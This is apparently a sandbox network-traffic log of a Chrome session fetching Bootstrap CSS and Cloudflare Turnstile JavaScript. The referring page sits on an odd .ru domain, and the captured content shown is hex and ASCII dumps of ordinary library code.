                                                                                                                                                              2024-01-17 16:39:02 UTC1378INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 30 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 64 36 65 66 64 3b 2d
                                                                                                                                                              Data Ascii: @charset "UTF-8";/*! * Bootstrap v5.0.2 (https://getbootstrap.com/) * Copyright 2011-2021 The Bootstrap Authors * Copyright 2011-2021 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root{--bs-blue:#0d6efd;-
                                                                                                                                                              2024-01-17 16:39:02 UTC1378INData Raw: 68 65 72 69 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 62 6f 72 64 65 72 3a 30 3b 6f 70 61 63 69 74 79 3a 2e 32 35 7d 68 72 3a 6e 6f 74 28 5b 73 69 7a 65 5d 29 7b 68 65 69 67 68 74 3a 31 70 78 7d 2e 68 31 2c 2e 68 32 2c 2e 68 33 2c 2e 68 34 2c 2e 68 35 2c 2e 68 36 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 33 37 35 72 65 6d 20 2b 20 31 2e 35 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29
                                                                                                                                                              Data Ascii: herit;background-color:currentColor;border:0;opacity:.25}hr:not([size]){height:1px}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{margin-top:0;margin-bottom:.5rem;font-weight:500;line-height:1.2}.h1,h1{font-size:calc(1.375rem + 1.5vw)}@media (min-width:1200px)
                                                                                                                                                              2024-01-17 16:39:02 UTC1378INData Raw: 5b 63 6c 61 73 73 5d 29 2c 61 3a 6e 6f 74 28 5b 68 72 65 66 5d 29 3a 6e 6f 74 28 5b 63 6c 61 73 73 5d 29 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 62 73 2d 66 6f 6e 74 2d 6d 6f 6e 6f 73 70 61 63 65 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 3b 75 6e 69 63 6f 64 65 2d 62 69 64 69 3a 62 69 64 69 2d 6f 76 65 72 72 69 64 65 7d 70 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 66 6f 6e 74
                                                                                                                                                              Data Ascii: [class]),a:not([href]):not([class]):hover{color:inherit;text-decoration:none}code,kbd,pre,samp{font-family:var(--bs-font-monospace);font-size:1em;direction:ltr;unicode-bidi:bidi-override}pre{display:block;margin-top:0;margin-bottom:1rem;overflow:auto;font
                                                                                                                                                              2024-01-17 16:39:02 UTC1378INData Raw: 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 2c 62 75 74 74 6f 6e 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 74 65 78 74 61 72 65 61 7b 72 65 73 69 7a 65 3a 76 65 72 74 69 63 61 6c 7d 66 69 65 6c 64 73 65 74 7b 6d 69 6e 2d 77 69 64 74 68 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 62 6f 72 64 65 72 3a 30 7d 6c 65 67 65 6e 64 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 32 37 35 72 65 6d
                                                                                                                                                              Data Ascii: not(:disabled),button:not(:disabled){cursor:pointer}::-moz-focus-inner{padding:0;border-style:none}textarea{resize:vertical}fieldset{min-width:0;padding:0;margin:0;border:0}legend{float:left;width:100%;padding:0;margin-bottom:.5rem;font-size:calc(1.275rem
                                                                                                                                                              2024-01-17 16:39:02 UTC1378INData Raw: 63 28 31 2e 35 32 35 72 65 6d 20 2b 20 33 2e 33 76 77 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 64 69 73 70 6c 61 79 2d 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 72 65 6d 7d 7d 2e 64 69 73 70 6c 61 79 2d 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 34 37 35 72 65 6d 20 2b 20 32 2e 37 76 77 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 64 69 73 70 6c 61 79 2d 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 2e 35 72 65 6d 7d 7d 2e 64 69 73 70 6c 61 79 2d 35 7b 66 6f 6e 74 2d 73 69 7a
                                                                                                                                                              Data Ascii: c(1.525rem + 3.3vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-3{font-size:4rem}}.display-4{font-size:calc(1.475rem + 2.7vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-4{font-size:3.5rem}}.display-5{font-siz
                                                                                                                                                              2024-01-17 16:39:02 UTC1378INData Raw: 2e 37 35 72 65 6d 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 76 61 72 28 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 2c 2e 37 35 72 65 6d 29 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 7b 6d 61 78 2d 77 69 64 74 68 3a 35 34 30 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 6d 64 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 7b 6d 61 78 2d 77 69 64 74 68 3a 37 32 30 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 39 32 70 78 29 7b
                                                                                                                                                              Data Ascii: .75rem);padding-left:var(--bs-gutter-x,.75rem);margin-right:auto;margin-left:auto}@media (min-width:576px){.container,.container-sm{max-width:540px}}@media (min-width:768px){.container,.container-md,.container-sm{max-width:720px}}@media (min-width:992px){
                                                                                                                                                              2024-01-17 16:39:02 UTC1378INData Raw: 2d 32 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 33 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 33 33 33 33 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 34 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 35 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 35 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 36 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 36 2e 36 36 36 36 36 36 36 36 36 37 25 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 63 6f 6c 2d 6d 64 7b 66 6c 65 78 3a 31
                                                                                                                                                              Data Ascii: -2>*{flex:0 0 auto;width:50%}.row-cols-sm-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-sm-4>*{flex:0 0 auto;width:25%}.row-cols-sm-5>*{flex:0 0 auto;width:20%}.row-cols-sm-6>*{flex:0 0 auto;width:16.6666666667%}}@media (min-width:768px){.col-md{flex:1
                                                                                                                                                              2024-01-17 16:39:02 UTC1378INData Raw: 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 31 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 32 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 33 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 33 33 33 33 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 34 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 35 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 35 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 36 3e 2a 7b 66 6c 65
                                                                                                                                                              Data Ascii: ;width:auto}.row-cols-xxl-1>*{flex:0 0 auto;width:100%}.row-cols-xxl-2>*{flex:0 0 auto;width:50%}.row-cols-xxl-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-xxl-4>*{flex:0 0 auto;width:25%}.row-cols-xxl-5>*{flex:0 0 auto;width:20%}.row-cols-xxl-6>*{fle
                                                                                                                                                              2024-01-17 16:39:02 UTC1378INData Raw: 2e 67 78 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 2e 35 72 65 6d 7d 2e 67 2d 34 2c 2e 67 79 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 31 2e 35 72 65 6d 7d 2e 67 2d 35 2c 2e 67 78 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 33 72 65 6d 7d 2e 67 2d 35 2c 2e 67 79 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 33 72 65 6d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 7b 2e 63 6f 6c 2d 73 6d 2d 61 75 74 6f 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 63 6f 6c 2d 73 6d 2d 31 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 2e 33 33 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 73 6d 2d 32 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31
                                                                                                                                                              Data Ascii: .gx-4{--bs-gutter-x:1.5rem}.g-4,.gy-4{--bs-gutter-y:1.5rem}.g-5,.gx-5{--bs-gutter-x:3rem}.g-5,.gy-5{--bs-gutter-y:3rem}@media (min-width:576px){.col-sm-auto{flex:0 0 auto;width:auto}.col-sm-1{flex:0 0 auto;width:8.33333333%}.col-sm-2{flex:0 0 auto;width:1
                                                                                                                                                              2024-01-17 16:39:02 UTC1378INData Raw: 2d 73 6d 2d 34 2c 2e 67 78 2d 73 6d 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 2e 35 72 65 6d 7d 2e 67 2d 73 6d 2d 34 2c 2e 67 79 2d 73 6d 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 31 2e 35 72 65 6d 7d 2e 67 2d 73 6d 2d 35 2c 2e 67 78 2d 73 6d 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 33 72 65 6d 7d 2e 67 2d 73 6d 2d 35 2c 2e 67 79 2d 73 6d 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 33 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 63 6f 6c 2d 6d 64 2d 31 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 2e 33 33 33 33 33 33 33 33 25 7d 2e 63 6f
                                                                                                                                                              Data Ascii: -sm-4,.gx-sm-4{--bs-gutter-x:1.5rem}.g-sm-4,.gy-sm-4{--bs-gutter-y:1.5rem}.g-sm-5,.gx-sm-5{--bs-gutter-x:3rem}.g-sm-5,.gy-sm-5{--bs-gutter-y:3rem}}@media (min-width:768px){.col-md-auto{flex:0 0 auto;width:auto}.col-md-1{flex:0 0 auto;width:8.33333333%}.co


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              7192.168.2.449745104.17.3.1844434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:03 UTC641OUTGET /turnstile/v0/b/c8377512/api.js HTTP/1.1
                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:03 UTC296INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:03 GMT
                                                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                              Content-Length: 35312
                                                                                                                                                              Connection: close
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008364dd66a4f-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:03 UTC1073INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 6e 2c 72 2c 75 2c 73 2c 66 2c 79 29 7b 74 72 79 7b 76 61 72 20 76 3d 65 5b 66 5d 28 79 29 2c 5f 3d 76 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 64 29 7b 72 28 64 29 3b 72 65 74 75 72 6e 7d 76 2e 64 6f 6e 65 3f 6e 28 5f 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 5f 29 2e 74 68 65 6e 28 75 2c 73 29 7d 66 75 6e 63 74 69 6f 6e 20 61 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 74 68 69 73 2c 72 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 75 2c 73 29 7b 76 61 72 20 66 3d 65 2e 61 70 70 6c 79 28 6e 2c 72 29 3b 66 75 6e 63 74
                                                                                                                                                              Data Ascii: "use strict";(function(){function nt(e,n,r,u,s,f,y){try{var v=e[f](y),_=v.value}catch(d){r(d);return}v.done?n(_):Promise.resolve(_).then(u,s)}function at(e){return function(){var n=this,r=arguments;return new Promise(function(u,s){var f=e.apply(n,r);funct
                                                                                                                                                              2024-01-17 16:39:03 UTC1369INData Raw: 21 31 2c 79 2c 76 3b 74 72 79 7b 66 6f 72 28 72 3d 72 2e 63 61 6c 6c 28 65 29 3b 21 28 73 3d 28 79 3d 72 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 75 2e 70 75 73 68 28 79 2e 76 61 6c 75 65 29 2c 21 28 6e 26 26 75 2e 6c 65 6e 67 74 68 3d 3d 3d 6e 29 29 3b 73 3d 21 30 29 3b 7d 63 61 74 63 68 28 5f 29 7b 66 3d 21 30 2c 76 3d 5f 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 73 26 26 72 2e 72 65 74 75 72 6e 21 3d 6e 75 6c 6c 26 26 72 2e 72 65 74 75 72 6e 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 66 29 74 68 72 6f 77 20 76 7d 7d 72 65 74 75 72 6e 20 75 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e
                                                                                                                                                              Data Ascii: !1,y,v;try{for(r=r.call(e);!(s=(y=r.next()).done)&&(u.push(y.value),!(n&&u.length===n));s=!0);}catch(_){f=!0,v=_}finally{try{!s&&r.return!=null&&r.return()}finally{if(f)throw v}}return u}}function ct(){throw new TypeError("Invalid attempt to destructure n
                                                                                                                                                              2024-01-17 16:39:03 UTC1369INData Raw: 74 75 72 6e 29 26 26 66 2e 63 61 6c 6c 28 73 29 2c 30 29 3a 73 2e 6e 65 78 74 29 26 26 21 28 66 3d 66 2e 63 61 6c 6c 28 73 2c 64 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 66 3b 73 77 69 74 63 68 28 73 3d 30 2c 66 26 26 28 64 3d 5b 64 5b 30 5d 26 32 2c 66 2e 76 61 6c 75 65 5d 29 2c 64 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 66 3d 64 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 72 2e 6c 61 62 65 6c 2b 2b 2c 7b 76 61 6c 75 65 3a 64 5b 31 5d 2c 64 6f 6e 65 3a 21 31 7d 3b 63 61 73 65 20 35 3a 72 2e 6c 61 62 65 6c 2b 2b 2c 73 3d 64 5b 31 5d 2c 64 3d 5b 30 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 20 37 3a 64 3d 72 2e 6f 70 73 2e 70 6f 70 28 29 2c 72 2e 74 72 79 73 2e 70 6f 70 28 29 3b 63 6f 6e 74 69 6e 75 65 3b
                                                                                                                                                              Data Ascii: turn)&&f.call(s),0):s.next)&&!(f=f.call(s,d[1])).done)return f;switch(s=0,f&&(d=[d[0]&2,f.value]),d[0]){case 0:case 1:f=d;break;case 4:return r.label++,{value:d[1],done:!1};case 5:r.label++,s=d[1],d=[0];continue;case 7:d=r.ops.pop(),r.trys.pop();continue;
                                                                                                                                                              2024-01-17 16:39:03 UTC1369INData Raw: 75 74 65 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 44 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 5f 46 41 49 4c 53 3d 22 61 6c 77 61 79 73 2d 66 61 69 6c 73 22 2c 65 2e 53 4f 4d 45 54 49 4d 45 53 5f 46 41 49 4c 53 3d 22 73 6f 6d 65 74 69 6d 65 73 2d 66 61 69 6c 73 22 2c 65 2e 4b 45 45 50 53 5f 4c 4f 4f 50 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 44 65 7c 7c 28 44 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 29 7b 72 65 74 75 72 6e 20 56 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 57 65 28 65 29 7b
                                                                                                                                                              Data Ascii: ute"})($||($={}));var De;(function(e){e.ALWAYS_FAILS="always-fails",e.SOMETIMES_FAILS="sometimes-fails",e.KEEPS_LOOPING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(De||(De={}));function Ue(e){return V(["auto","dark","light"],e)}function We(e){
                                                                                                                                                              2024-01-17 16:39:03 UTC1369INData Raw: 65 74 75 72 6e 20 47 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 75 2c 73 29 7b 72 65 74 75 72 6e 20 75 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 2c 75 7d 2c 47 28 65 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 62 74 28 65 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 20 6e 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 6e 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 26 26 6e 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a
                                                                                                                                                              Data Ascii: eturn G=Object.setPrototypeOf||function(u,s){return u.__proto__=s,u},G(e,n)}function bt(e,n){if(typeof n!="function"&&n!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(n&&n.prototype,{constructor:
                                                                                                                                                              2024-01-17 16:39:03 UTC1369INData Raw: 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 47 28 73 2c 75 29 7d 2c 77 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 77 74 28 65 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 26 26 28 4c 28 6e 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 6e 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 6e 3a 62 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 53 74 28 65 29 7b 76 61 72 20 6e 3d 45 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 75 3d 4b 28 65 29 2c 73 3b 69 66 28 6e 29 7b 76 61 72 20 66 3d 4b 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 73 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 75 2c 61 72 67 75 6d 65 6e 74 73 2c 66 29 7d 65 6c 73 65 20 73 3d 75 2e 61 70 70 6c 79 28 74 68 69
                                                                                                                                                              Data Ascii: e:!0,configurable:!0}}),G(s,u)},we(e)}function wt(e,n){return n&&(L(n)==="object"||typeof n=="function")?n:be(e)}function St(e){var n=Ee();return function(){var u=K(e),s;if(n){var f=K(this).constructor;s=Reflect.construct(u,arguments,f)}else s=u.apply(thi
                                                                                                                                                              2024-01-17 16:39:03 UTC1369INData Raw: 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 2c 76 3b 21 28 75 3d 28 76 3d 79 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 75 3d 21 30 29 7b 76 61 72 20 5f 3d 5f 65 28 76 2e 76 61 6c 75 65 2c 32 29 2c 64 3d 5f 5b 30 5d 2c 6d 3d 5f 5b 31 5d 2c 53 3b 6d 2e 77 61 74 63 68 63 61 74 2e 73 65 71 3d 54 65 2c 6d 2e 77 61 74 63 68 63 61 74 2e 6c 61 73 74 41 63 6b 65 64 53 65 71 3d 3d 3d 30 26 26 28 6d 2e 77 61 74 63 68 63 61 74 2e 6c 61 73 74 41 63 6b 65 64 53 65 71 3d 54 65 29 3b 76 61 72 20 77 3d 59 28 64 29 3b 69 66 28 21 77 29 7b 6d 2e 77 61 74 63 68 63 61 74 2e 6d 69 73 73 69 6e 67 57 69 64 67 65 74 57 61 72 6e 69 6e 67 7c 7c 28 68 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 57 69 64 67 65 74 20 22 2e 63 6f 6e 63 61 74 28 77 2c 22 2c 20 63 6f 6e 73 69
                                                                                                                                                              Data Ascii: Symbol.iterator](),v;!(u=(v=y.next()).done);u=!0){var _=_e(v.value,2),d=_[0],m=_[1],S;m.watchcat.seq=Te,m.watchcat.lastAckedSeq===0&&(m.watchcat.lastAckedSeq=Te);var w=Y(d);if(!w){m.watchcat.missingWidgetWarning||(h("Cannot find Widget ".concat(w,", consi
